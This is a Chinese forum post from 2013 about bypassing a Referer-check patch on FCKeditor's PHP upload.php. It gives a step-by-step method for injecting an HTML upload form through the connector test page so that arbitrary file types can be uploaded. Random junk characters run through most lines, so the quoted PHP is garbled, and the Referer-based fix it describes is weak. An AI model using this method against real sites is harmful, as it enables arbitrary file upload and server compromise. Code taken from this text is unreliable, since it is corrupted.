漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php- ~ N# P* u2 l3 R" I7 Z, e" P
网上给出的修复方案是
; S/ V) g9 B; z修复方法,删除FCK编辑器用其他的编辑器
3 S( ], D3 a6 N8 V$ y或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
2 m6 C9 t# R4 ?0 V; ^6 B1 u在" p( S9 H2 c3 E. p( y8 O& P3 ?2 y
require(‘config.php’);* I. ^& Z: S; a' F5 W- J
require(‘util.php’);2 s, O$ z. ~- o0 t/ e4 B
的下面添加以下代码—————————–4 I; B T& G; z [* C
//防止外部提交
* [+ X6 v" U+ t: I/ N5 r& B/ Tfunction outsidepost()( `, j2 p5 |( M9 \* D
{; x* W& @4 I! `6 g; C0 P. h/ U( X8 ?
$servername=$_SERVER['SERVER_NAME'];
2 s- c8 N( `6 |5 ?$sub_from=@$_SERVER['HTTP_REFERER'];" o1 R# v P. V L8 G2 W0 p
$sub_len=strlen($servername);* u' _/ p& _; D1 F8 B
$checkfrom=substr($sub_from,7,$sub_len);+ J+ Z, e4 y( A+ k
if($checkfrom!=$servername){: _- E* ^5 I- V$ f- G
echo(“you don’t outsidepost!”);& L- ~0 X2 M: m( i0 k. ?9 K
exit;2 z6 C$ S% |2 o; s$ j' e; A0 X/ Y% E
}
4 N0 r. x! K+ x& a" j}5 t/ G; p, i9 c7 l
outsidepost();* Q& u) @ |5 F3 T
防止外部提交,但是没有防止内部提交,
* ?3 e! B/ }( M3 ~9 N, D c利用方法:. k# z6 S5 Q/ c1 n. Y; y$ e6 N8 C
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html4 t* @+ B( ?) @% L5 `; V
2,在Current Folder 框输入
2 y. X$ X+ a: s7 `) `<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
! O* t, p1 F5 ~( S5 ?' u然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。, g2 n2 f' `. z# }/ y, r
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对